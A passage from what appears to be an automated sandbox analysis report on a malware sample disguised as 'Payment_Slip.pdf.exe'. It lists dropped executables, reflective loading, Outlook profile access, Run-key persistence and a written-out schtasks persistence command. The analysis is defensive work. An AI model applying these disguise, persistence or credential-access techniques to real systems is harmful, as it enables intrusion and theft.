                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: sxs.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: vaultcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: rasapi32.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: rasman.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: rtutils.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: vaultcli.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: sxs.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: vaultcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeSection loaded: edputil.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile opened: C:\Users\user\Desktop\Payment_Slip.pdf.cfg
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: Payment_Slip.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: Payment_Slip.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              barindex
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs.Net Code: mxE3KDYg98 System.Reflection.Assembly.Load(byte[])
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041A8DA
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004000D8 push es; iretd 11_2_004000D9
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040008C push es; iretd 11_2_0040008D
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004542E6 push ecx; ret 11_2_004542F9
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0045B4FD push esi; ret 11_2_0045B506
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00432BD6 push ecx; ret 11_2_00432BE9
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00454C08 push eax; ret 11_2_00454C26
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D3DF0 push esi; retn 0006h12_2_007D3F6A
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D40F9 push edi; retn 0006h12_2_007D40FA
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D5168 pushad ; retn 0006h12_2_007D516A
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D3D41 push ebp; retn 0006h12_2_007D3D42
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D3DE1 push esi; retn 0006h12_2_007D3DE2
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D3D81 push ebp; retn 0006h12_2_007D3D82
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D3E78 push esi; retn 0006h12_2_007D3E7A
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_067FB943 push es; ret 12_2_067FB950
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_068377B4 push es; ret 12_2_068377C0
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_068377DC push es; ret 12_2_068377C0
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C35348 push edi; ret 12_2_06C35702
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C3CF20 push 9806C22Ah; retf 12_2_06C3CF25
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C3B248 push ss; retn 0006h12_2_06C3B24A
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C3A3A8 push cs; retn 0006h12_2_06C3A3AA
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_05B28BEF push edi; retn 0000h13_2_05B28BF1
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682F7D8 push eax; retn 0683h13_2_0682F999
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06827638 push esp; ret 13_2_06827685
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06824085 push 8B000003h; iretd 13_2_0682408C
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A9BE78 push eax; ret 13_2_06A9BE79
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A90B33 push eax; iretd 13_2_06A90B39
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A948E1 push 7806AC64h; ret 13_2_06A948ED
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044693D push ecx; ret 14_2_0044694D
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00451D54 push eax; ret 14_2_00451D61
                              Source: Payment_Slip.pdf.exeStatic PE information: section name: .text entropy: 7.92864214342551
                              Source: mHTmhPhJy.exe.0.drStatic PE information: section name: .text entropy: 7.92864214342551
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, y6YcC1IOBotyQaRh6iv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UGqmJ8MBqD', 'wN4mQBplev', 'eibmxS6tNg', 'nEbmY9m5u9', 'cKpm1IjB4r', 'fvfmM2w59Q', 'kUWmFBbCUp'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkUSwEDOYAt7lMcOwY.csHigh entropy of concatenated method names: 'NRA8pUUdsa', 'Aw68vN7LDN', 'KDM8neba9o', 'xeT8Dtl9Y1', 'UX687G7tUB', 'LsP85USCFS', 'OdF8gj36Yo', 'bOr8G9JObC', 'u278RGPWqT', 'A2j8mY130i'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, yKfW5T3tGnC6kmUxYP.csHigh entropy of concatenated method names: 'XkvIj6t4op', 'bAoIe1Qtrx', 'COYITAt7lM', 'eOwIVYkAlm', 'IEFI7Ru15P', 'pZ5I5j5SaK', 'hdjSCBE87qxDviTt4R', 'x8QjfLcT4dJ3jgHCOK', 'hOkIIP0PWs', 'vHsIyAx3kT'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, KRVs7iYj6yPbNKa0Yl.csHigh entropy of concatenated method names: 'rvC7bRxxO5', 'aYm7QEVGFS', 'oZU7YqDDGA', 'De3713rDtB', 'hFK7oLwpSy', 'jNY7UqLH7i', 'uyG7Bbiq90', 'dlx7sFbbJD', 'irp7iO4JBc', 'cR47AM11Ke'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, tqpMvgxuTt3IAmVCrg.csHigh entropy of concatenated method names: 'mdfZnqQ9eo', 'r4nZDfEQbn', 'NM2Z0jxft6', 'MQqZoCJ597', 'FXVZBCOn8D', 'GwAZsP1aKJ', 'zvuZA8rWfc', 'XaWZSqqNGP', 'GAPZbYdVwt', 'KfZZJkRVHi'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, Gk9PdaMAVGGLVrsCuI.csHigh entropy of concatenated method names: 'ToString', 'GBx5J3M3FH', 'y4g5ojIYbK', 'pOZ5Ue8nt0', 'ojx5BVZ8nf', 'mRe5sMisqQ', 'lip5iIkXTo', 'A9f5A3HKdF', 'IkI5S0Mn86', 'Rqd5HDRLNk'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, mL1yOx2rBFYlGxdGQM.csHigh entropy of concatenated method names: 'eWjK6wMy8', 'BRZpmaJir', 'GAhv5Syb9', 'YdiE7VJiA', 'YCtD1RUOZ', 'h0whLHPGf', 'd81F6u1bwc0SAnwWb1', 'lnfZjLGrwRr5QTfwox', 'jxSGX1WmW', 'EF4mHcA6U'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, jU3mqX4JiC8fXaRuWG.csHigh entropy of concatenated method names: 'oq3m8GhS2N', 'y8bmfylHu8', 'c84mtrInDC', 'JGEmjYGwsu', 'zOMmRWJOCN', 'OkymepOUDF', 'Next', 'Next', 'Next', 'NextBytes'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, bJtGO9II6JaEOek5Jqh.csHigh entropy of concatenated method names: 'q7um4o7aYo', 'BZomzrx2gO', 'YSqNOkrbVB', 'HwKNI7bGlc', 'DC1N2SnMOO', 'PZANy41hP3', 'bcsN3Kb0Nx', 'Ea1Ncu2SUS', 'TUeNwe8cwW', 'oFTNPPlQfa'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, WAlmw8hg1iD9JBEFRu.csHigh entropy of concatenated method names: 'xiHf6olSRJ', 'IU5fEET5PG', 'WIM8UKvhB8', 'DRr8BONLdy', 'glm8sMFPeg', 'yRX8iqtX05', 'OI18A7rDtE', 'KS78SAjU6a', 'WVi8Hltphl', 'CBd8bOvTCa'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.csHigh entropy of concatenated method names: 'cCVyc3lRiN', 'zTeywke01j', 'SBsyPGRBgf', 'wQhy8FpRGx', 'wO8yfLtUGT', 'oOZytcyA9G', 'UgFyjCmHVA', 'f7kyem263L', 'kqwydB6Lup', 'hQhyT0iZMy'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, nINbxJCQ3XxrE7Js03.csHigh entropy of concatenated method names: 'BGqgWDwfC8', 'cStg4fumVv', 'if7GOqEG1O', 'G6CGIJENII', 'nbygJmdS3Z', 'nWogQEfY5R', 'Ix9gxcgPT6', 'oXcgYasOpV', 'HA5g16Oi35', 'TnVgMny3g6'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, Vex4ilFu8A9XAL3nwL.csHigh entropy of concatenated method names: 'zOmgTGZimL', 'CB5gVgMSKh', 'ToString', 'X5Dgwj0tdk', 'jOZgPNwHFj', 'TlOg82CcIV', 'blogfLMNpv', 'XBFgtM8VnN', 'igAgjdDh3i', 'ichgexJKcY'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, MSJvbOHcHTO0c3bCdq.csHigh entropy of concatenated method names: 'QO4jaretvn', 'jMGjqD98Of', 'MpbjKbm1Rc', 'V3wjp8uKh1', 'fKnj655umG', 'JthjvX3Vf4', 'p0WjEW0Eas', 'b51jnrqRVF', 'XG5jD3h7yy', 'UGqjhu5bfc'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.csHigh entropy of concatenated method names: 'Ad8PYPNMSv', 'CJYP1UHGGf', 'MxcPM8bIAF', 'Y5yPFucZwN', 'E5QPlSIsoa', 'j9yPCnEMsh', 'mIlPk8F5LR', 'DC5PWDZvKJ', 'z5SPLb8Jay', 'vR9P413nj9'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, QnXqhezuvN7cIpValM.csHigh entropy of concatenated method names: 'VlmmvXcQ5J', 'bAgmn9TmV9', 'IPZmDB51I7', 'OpGm08dtIS', 'AFamo7xICr', 'kokmBOL1h1', 'nI8msjCjni', 'PGPmXO928N', 'VW2masbI4o', 'hjSmqeHVg8'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, ijY91ePT8UGDHEvgSe.csHigh entropy of concatenated method names: 'Dispose', 'v09ILg28Zp', 'RV02oNpKhO', 'TRM936xQoU', 'QnFI4Wp73l', 'TO7Iz7rI6g', 'ProcessDialogKey', 'toV2Onr9uJ', 'dfK2IUumCA', 'B0M22tU3mq'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, NSam4kI3GhkqpuZJciv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'j6LuRxG8ip', 'lrXummPSHO', 'ssFuN73QJn', 'Q5iuuZE0AL', 'VnLursiNC9', 'Q3Tu9GtmGB', 'gCpuXGVGeS'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, sBkofI8Vdfu7QC8btk.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cUm2LD7Rw5', 'i7b24pnTml', 'TTY2zK2dBK', 'u65yO0V4ia', 'Qs0yIbfPJj', 'xCqy2DrlnM', 'GdyyymARuD', 'RGITeyIoAWrcZ2DHY7i'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, o5Pu5QAYgvExHeVGbP.csHigh entropy of concatenated method names: 'sWujw0pgrG', 'IdQj87lcB5', 'tVQjtDbXco', 'trat4eKBas', 'YLOtzXryjL', 'xrCjOtjNaQ', 'N8njI3u1I7', 'fd9j2eq6AF', 'LKTjycG0Yp', 'Fklj3ih7UU'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, fynTdqk87r09g28Zpx.csHigh entropy of concatenated method names: 'XTqR7hVKJk', 'XiIRgU5848', 'D0VRRlrsZy', 'hF1RNqP4Ss', 'DepRrP3r2G', 'hr7RXgJvTJ', 'Dispose', 'lOcGwuiNT4', 'UctGP4gmkm', 'ChbG86Y8AZ'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, R5P5Z50j5SaKrgriEl.csHigh entropy of concatenated method names: 'tlBtccHd4u', 'gL1tPfkvy3', 'SaKtffOlhm', 'jWvtjx9upP', 'TwxteyCRXA', 'IX2fljlhWy', 'Ft9fCHLZEO', 'oj8fkTSsOI', 'Qw9fWnDQ2a', 'eBMfLMSCUL'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, mnr9uJLyfKUumCAv0M.csHigh entropy of concatenated method names: 'Y44R0aga1H', 'BjNRonM0LP', 'KMBRUBPGSD', 'J2wRBLoiwq', 'haSRsgNLrL', 'IKIRiKA5bX', 'UYwRARp4Pg', 'bpxRSudZcd', 'tMuRHnHE7J', 'sTZRbO6R0o'
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004063C6 ShellExecuteW,URLDownloadToFileW,11_2_004063C6
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\dwn.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeFile created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile created: C:\Users\user\AppData\Roaming\host.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\host.exeFile created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\conserver.exeJump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update
                              Source: C:\Users\user\AppData\Roaming\host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_00418A00
